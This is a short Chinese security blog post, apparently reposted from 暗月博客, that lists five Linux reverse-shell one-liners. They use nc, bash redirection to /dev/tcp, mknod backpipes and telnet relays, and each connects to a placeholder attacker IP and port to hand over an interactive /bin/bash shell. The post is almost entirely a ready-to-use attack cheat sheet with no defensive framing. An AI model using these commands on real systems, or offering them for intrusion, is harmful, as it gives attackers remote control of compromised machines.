linux下反弹Shell的五种方法

暗月博客 2019年11月21日20:29:16评论472 views字数 311阅读1分2秒阅读模式

1. nc <attacker_ip> <port> -e /bin/bash

 
 
 
 
2. mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
 
 
 
3. /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
 
 
 
 
4. mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
 
 
 
 
5. telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日20:29:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   linux下反弹Shell的五种方法http://cn-sec.com/archives/71896.html

发表评论

匿名网友 填写信息